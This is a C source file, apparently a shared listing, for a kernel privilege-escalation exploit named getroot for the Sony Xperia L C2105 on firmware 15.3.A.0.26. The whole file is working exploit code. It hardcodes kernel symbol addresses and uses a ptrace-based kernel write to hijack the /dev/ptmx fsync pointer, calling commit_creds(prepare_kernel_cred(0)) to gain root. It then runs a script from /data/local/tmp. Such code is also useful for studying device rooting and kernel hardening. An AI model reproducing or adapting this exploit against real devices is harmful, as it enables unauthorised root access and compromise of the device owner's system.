Xperia L C2105 15.3.A.0.26 getroot.c

1. /* getroot for Xperia L C2105 15.3.A.0.26 */
2.  
3. /*
4. * Copyright (C) 2013 CUBE
5. *
6. * This program is free software: you can redistribute it and/or modify
7. * it under the terms of the GNU General Public License as published by
8. * the Free Software Foundation, either version 3 of the License, or
9. * (at your option) any later version.
10. *
11. * This program is distributed in the hope that it will be useful,
12. * but WITHOUT ANY WARRANTY; without even the implied warranty of
13. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14. * GNU General Public License for more details.
15. *
16. * You should have received a copy of the GNU General Public License
17. * along with this program. If not, see <http://www.gnu.org/licenses/>.
18. *
19. */
20.  
21. #define PREPARE_KERNEL_CRED_ADDRESS 0xc00a87c8
22. #define COMMIT_CREDS_ADDRESS 0xc00a82ec
23. #define PTMX_FOPS_ADDRESS 0xc1087aa0
24. #define EXECCOMMAND "/data/local/tmp/install_tool.sh"
25.  
26. #include <stdio.h>
27. #include <stdlib.h>
28. #include <sys/ptrace.h>
29. #include <sys/syscall.h>
30. #include <stdbool.h>
31. #include <errno.h>
32. #include <signal.h>
33. #include <sys/wait.h>
34. #include <sys/types.h>
35. #include <sys/stat.h>
36. #include <fcntl.h>
37.  
38. #define PTMX_DEVICE "/dev/ptmx"
39.  
40. struct cred;
41. struct task_struct;
42.  
43. struct cred *(*prepare_kernel_cred)(struct task_struct *);
44. int (*commit_creds)(struct cred *);
45.  
46. bool bChiled;
47.  
48. void obtain_root_privilege(void) {
49. commit_creds(prepare_kernel_cred(0));
50. }
51.  
52. static bool run_obtain_root_privilege(void *user_data) {
53. int fd;
54.  
55. fd = open(PTMX_DEVICE, O_WRONLY);
56. fsync(fd);
57. close(fd);
58.  
59. return true;
60. }
61.  
62. void ptrace_write_value_at_address(unsigned long int address, void *value) {
63. pid_t pid;
64. long ret;
65. int status;
66.  
67. bChiled = false;
68. pid = fork();
69. if (pid < 0) {
70. return;
71. }
72. if (pid == 0) {
73. ret = ptrace(PTRACE_TRACEME, 0, 0, 0);
74. if (ret < 0) {
75. fprintf(stderr, "PTRACE_TRACEME failed\n");
76. }
77. bChiled = true;
78. signal(SIGSTOP, SIG_IGN);
79. kill(getpid(), SIGSTOP);
80. exit(EXIT_SUCCESS);
81. }
82.  
83. do {
84. ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &bChiled, &bChiled);
85. } while (!bChiled);
86.  
87. ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &value, (void *)address);
88. if (ret < 0) {
89. fprintf(stderr, "PTRACE_PEEKDATA failed: %s\n", strerror(errno));
90. }
91.  
92. kill(pid, SIGKILL);
93. waitpid(pid, &status, WNOHANG);
94. }
95.  
96. bool ptrace_run_exploit(unsigned long int address, void *value, bool (*exploit_callback)(void *user_data), void *user_data) {
97. bool success;
98.  
99. ptrace_write_value_at_address(address, value);
100. success = exploit_callback(user_data);
101.  
102. return success;
103. }
104.  
105. static bool run_exploit(void) {
106. unsigned long int ptmx_fops_address;
107. unsigned long int ptmx_fsync_address;
108.  
109. ptmx_fops_address = PTMX_FOPS_ADDRESS;
110. ptmx_fsync_address = ptmx_fops_address + 0x38;
111. return ptrace_run_exploit(ptmx_fsync_address, &obtain_root_privilege, run_obtain_root_privilege, NULL);
112. }
113.  
114. int main(int argc, char **argv) {
115. pid_t pid;
116.  
117. prepare_kernel_cred = (void *)PREPARE_KERNEL_CRED_ADDRESS;
118. commit_creds = (void *)COMMIT_CREDS_ADDRESS;
119.  
120. printf("Wait a minutes...\n");
121. run_exploit();
122.  
123. if (getuid() != 0) {
124. printf("Failed to getroot.\n");
125. exit(EXIT_FAILURE);
126. }
127.  
128. printf("Succeeded in getroot!\n");
129. system(EXECCOMMAND);
130.  
131. exit(EXIT_SUCCESS);
132. return 0;
133. }